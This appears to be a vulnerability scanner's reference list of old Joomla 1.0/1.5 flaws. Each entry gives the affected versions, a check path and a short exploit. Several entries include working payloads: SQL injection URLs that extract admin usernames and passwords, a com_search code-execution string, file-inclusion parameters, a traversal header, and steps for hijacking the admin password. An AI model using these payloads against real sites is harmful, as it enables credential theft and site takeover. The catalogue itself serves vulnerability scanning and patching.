Joomla Vulnerabilities and Exploits at a Glance


    Generic: Unprotected Administrator directory

    Versions Affected: Any

    Check: /administrator/

    Exploit: The default /administrator directory is detected. Attackers can brute-force administrator accounts.

     

     

    Core: Multiple XSS/CSRF Vulnerability

    Versions Affected: 1.5.9 <=

    Check: /?1.5.9-x

    Exploit: A series of XSS and CSRF faults exist in the administrator application. Affected administrator components include com_admin, com_media, com_search. Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities.

     

     

    Core: JSession SSL Session Disclosure Vulnerability

    Versions Affected: Joomla! 1.5.8 <=

    Check: /?1.5.8-x

    Exploit: When running a site under SSL (the entire site is forced to be under SSL), Joomla! does not set the Secure (SSL) flag on the cookie. This can allow someone monitoring the network to find the cookie related to the session.

     

     

     

    Core: Frontend XSS Vulnerability

    Versions Affected: 1.5.10 <=

    Check: /?1.5.10-x

    Exploit: Some values were output from the database without being properly escaped. Most strings in question were sourced from the administrator panel. A malicious normal admin can leverage it to gain access to super admin.

     

     

     

    Core: Missing JEXEC Check – Path Disclosure Vulnerability

    Versions Affected: 1.5.11 <=

    Check: /libraries/phpxmlrpc/xmlrpcs.php

    Exploit: /libraries/phpxmlrpc/xmlrpcs.php

     

     

     

    Core: Missing JEXEC Check – Path Disclosure Vulnerability

    Versions Affected: 1.5.12 <=

    Check: /libraries/joomla/utilities/compat/php50x.php

    Exploit: /libraries/joomla/utilities/compat/php50x.php

     

     

     

    Core: Frontend XSS – HTTP_REFERER not properly filtered Vulnerability

    Versions Affected: 1.5.11 <=

    Check: /?1.5.11-x-http_ref

    Exploit: An attacker can inject JavaScript or DHTML code that will be executed in the context of the targeted user's browser, allowing the attacker to steal cookies. The HTTP_REFERER variable is not properly parsed.

     

     

     

    Core: Frontend XSS – PHP_SELF not properly filtered Vulnerability

    Versions Affected: 1.5.11 <=

    Check: /?1.5.11-x-php-s3lf

    Exploit: An attacker can inject JavaScript code in a URL that will be executed in the context of the targeted user's browser.

     

     

     

    Core: Authentication Bypass Vulnerability

    Versions Affected: Joomla! 1.5.3 <=

    Check: /administrator/

    Exploit: The backend accepts any password for a custom Super Administrator when LDAP is enabled.

     

     

     

    Core: Path Disclosure Vulnerability

    Versions Affected: Joomla! 1.5.3 <=

    Check: /?1.5.3-path-disclose

    Exploit: Crafted URL can disclose absolute path

     

     

     

    Core: User redirected Spamming Vulnerability

    Versions Affected: Joomla! 1.5.3 <=

    Check: /?1.5.3-spam

    Exploit: User redirect spam

     

     

     

    Core: joomla.php Remote File Inclusion Vulnerability

    Versions Affected: 1.0.0

    Check: /includes/joomla.php

    Exploit: /includes/joomla.php?includepath=

     

     

     

    Core: Admin Backend Cross Site Request Forgery Vulnerability

    Versions Affected: 1.0.13 <=

    Check: /administrator/

    Exploit: It requires an administrator to be logged in and to be tricked into visiting a specially crafted webpage.

     

     

     

    Core: Path Disclosure Vulnerability

    Versions Affected: Joomla! 1.5.12 <=

    Check: /libraries/joomla/utilities/compat/php50x.php

    Exploit: /libraries/joomla/utilities/compat/php50x.php

     

     

     

    CorePlugin: Xstandard Editor X_CMS_LIBRARY_PATH Local Directory Traversal Vulnerability

    Versions Affected: Joomla! 1.5.8 <=

    Check: /plugins/editors/xstandard/attachmentlibrary.php

    Exploit: Submit new header X_CMS_LIBRARY_PATH with value ../ to /plugins/editors/xstandard/attachmentlibrary.php

     

     

     

    CoreTemplate: ja_purity XSS Vulnerability

    Versions Affected: 1.5.10 <=

    Check: /templates/ja_purity/

    Exploit: An XSS vulnerability exists in the JA_Purity template which ships with Joomla! 1.5.

     

     

    CoreLibrary: phpmailer Remote Code Execution Vulnerability

    Versions Affected: Joomla! 1.5.0 Beta/Stable

    Check: /libraries/phpmailer/phpmailer.php

    Exploit: N/A

     

     

     

    CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities

    Versions Affected: Joomla! 1.5.12

    Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/

    Exploit: While the Joomla! team announced only a File Upload vulnerability, in fact there are many. See: http://www.milw0rm.com/exploits/9296

     

     

     

    CoreComponent: Joomla Remote Admin Password Change Vulnerability

    Versions Affected: 1.5.5 <=

    Check: /components/com_user/controller.php

    Exploit: 1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm 2. Write into field “token” char ‘ and Click OK. 3. Write new password for admin 4. Go to url : target.com/administrator/ 5. Login admin with new password

     

     

     

    CoreComponent: com_content SQL Injection Vulnerability

    Version Affected: Joomla! 1.0.0 <=

    Check: /components/com_content/

    Exploit: /index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72–

     

     

     

    CoreComponent: com_search Remote Code Execution Vulnerability

    Version Affected: Joomla! 1.5.0 beta 2 <=

    Check: /components/com_search/

    Exploit: /index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3B

     

     

     

    CoreComponent: com_admin File Inclusion Vulnerability

    Versions Affected: N/A

    Check: /administrator/components/com_admin/admin.admin.html.php

    Exploit: /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=

     

     

     

    CoreComponent: MailTo SQL Injection Vulnerability

    Versions Affected: N/A

    Check: /components/com_mailto/

    Exploit: /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72–&Itemid=1

     

     

     

    CoreComponent: com_content Blind SQL Injection Vulnerability

    Versions Affected: Joomla! 1.5.0 RC3

    Check: /components/com_content/

    Exploit: /index.php?option=com_content&view=%’ +’a’=’a&id=25&Itemid=28

     

     

     

    CoreComponent: com_content XSS Vulnerability

    Version Affected: Joomla! 1.5.7 <=

    Check: /components/com_content/

    Exploit: The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc). This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration.

     

     

     

    CoreComponent: com_weblinks XSS Vulnerability

    Version Affected: Joomla! 1.5.7 <=

    Check: /components/com_weblinks/

    Exploit: [Requires valid user account] com_weblinks allows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms).

     

     

     

    CoreComponent: com_mailto Email Spam Vulnerability

    Version Affected: Joomla! 1.5.6 <=

    Check: /components/com_mailto/

    Exploit: The mailto component does not verify the validity of the URL prior to sending.

     

     

    CoreComponent: com_content view=archive SQL Injection Vulnerability

    Versions Affected: Joomla! 1.5.0 Beta1/Beta2/RC1

    Check: /components/com_content/

    Exploit: Unfiltered POST vars – filter, month, year to /index.php?option=com_content&view=archive

     

     

     

    CoreComponent: com_content XSS Vulnerability

    Version Affected: Joomla! 1.5.9 <=

    Check: /components/com_content/

    Exploit: An XSS vulnerability exists in the category view of com_content.

     

     

     

    CoreComponent: com_installer CSRF Vulnerability

    Versions Affected: Joomla! 1.5.0 Beta

    Check: /administrator/components/com_installer/

    Exploit: N/A

     

     

     

    CoreComponent: com_search Memory Consumption DoS Vulnerability

    Versions Affected: Joomla! 1.5.0 Beta

    Check: /components/com_search/

    Exploit: N/A

     

     

     

    CoreComponent: com_poll (mosmsg) Memory Consumption DOS Vulnerability

    Versions Affected: 1.0.7 <=

    Check: /components/com_poll/

    Exploit: Send request /index.php?option=com_poll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><>

     

     

     

    CoreComponent: com_banners Blind SQL Injection Vulnerability

    Versions Affected: N/A

    Check: /components/com_banners/

    Exploit: /index.php?option=com_banners&task=archivesection&id=0’+and+’1’=’1::/index.php?option=com_banners&task=archivesection&id=0’+and+’1’=’2

     

     

    CoreComponent: com_mailto timeout Vulnerability

    Versions Affected: 1.5.13 <=

    Check: /components/com_mailto/

    Exploit: [Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated emails
